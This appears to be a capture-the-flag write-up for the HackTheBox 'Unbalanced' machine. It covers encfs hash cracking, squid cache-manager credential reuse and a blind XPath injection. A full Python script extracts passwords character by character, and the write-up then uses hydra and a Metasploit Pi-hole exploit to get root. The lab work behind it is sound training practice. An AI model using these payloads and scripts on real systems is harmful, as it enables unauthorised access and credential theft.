HTB Unbalanced

Writeup for Unbalanced box on HackTheBox.eu

Initial Enumeration

Found rsync and copied data - need password to decrypt encfs

Use encfs2john to create a hash for john to crack

/usr/share/john/encfs2john.py conf_backups > john.json
sudo john -wordlist=/usr/share/wordlists/rockyou.txt john.json

We know we have squid running so let's check this config first

cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable all

Using https://github.com/limitedeternity/squidclient

./squidclient -h 10.10.10.200 -p 3128 -u cachemgr -w 'Thah$Sh1' fqdncache

We are working with a docker host and squid is proxying requests to docker containers

http://172.31.179.1/

POST http://172.31.179.1/intranet.php HTTP/1.1

Host: 172.31.179.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://172.31.179.1/intranet.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0



Username=a'+and+''='&Password=a

Not invalid credentials but adds a div to the page so we are dealing with a blind sqlinjection

The following requests generates a list of users:

#!/usr/bin/python3

import requests

proxy = {
    'http': 'http://10.10.10.200:3128'
}

def processRequest(user,password):
    req = requests.post('http://172.31.179.1/intranet.php', data={
        'Username': user,
        'Password': password
    },
    proxies=proxy)
    req.close()
    print(req.text)
    print(len(req.text))
    if 'Invalid credentials.' in req.text:
        return True
    
    return False


if processRequest("' or 'y'='y", "' or 'c'='c"):
    print ('Invalid OK')
else:
    print ('Page Error')
rita
Rita Fubelli

ri[email protected]

Role: HR Manager

jim
Jim Mickelson

[email protected]

Role: Web Designer

bryan
Bryan Angstrom

[email protected]

Role: System Administrator

sarah
Sarah Goodman

[email protected]

Role: Team Leader

Using a pyhon script we can enumerate all passwords for the users

#!/usr/bin/python3

import requests, sys 

asd= '|/-\\'
alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&()*+,-./:;<=>[email protected][\\]^_`{|}~'
proxies = { "http" : "http://10.10.10.200:3128" }
url = "http://172.31.179.1/intranet.php"
usernames = [ 'rita','jim','bryan','sarah' ]

for user in usernames:
    #BASE REPONSE LENGTH
    data = { "Username" : "", "Password" : "' or Username='" + user + "' and string-length(Password)='200" }
    r = requests.post(url, data=data, proxies=proxies)
    base_len = len(r.content)
    pass_len = 0

    for i in range(30): #Extract password length
        data = { "Username" : "", "Password" : "' or Username='" + user + "' and string-length(Password)='" + str(i) }
        r = requests.post(url, data=data, proxies=proxies) 
        if(len(r.content) != base_len):
            print("[+] " + user + " has a password of " + str(i) + " characters!")
            pass_len = i
            break

    password = ''       
    for i in range(1,pass_len+1): #Extract password, character by character
        x=0
        for char in alphabet:
            if(x>3): x=0
            data = { "Username" : "", "Password" : "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + char }
            r = requests.post(url, data=data, proxies=proxies)
            print("[" + asd[x:x+1] + "]" + " Extracting: " + password)
            x += 1
            sys.stdout.write("\033[F")
            if(len(r.content) != base_len):
                password += char
                if(i == pass_len):
                    print("[/]" + " Extracting: " + password)
                sys.stdout.flush()
                break

    print("\033[92m" + user + " = " + password + "\033[0m")

Passwords:

password01!
stairwaytoheaven
ireallyl0vebubblegum!!!
sarah4evah

Using this in combination with usernames we can put hydra to work and check ssh, soon enough we find a match for bryan

User Enumeration

TODO:
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

Found pi-hole on 172.31.11.3 so let's forward this to our local and see what we can see:

ssh -L 8888:172.31.11.3:80 [email protected]

Privilege escalation

Using admin as password we can login, and we can execute an exploit from metasploit (exploit/unix/http/pihole_blocklist_exec)

Password: bUbBl3gUm$43v3Ry0n3!

Testing the password above as root password for bryan works.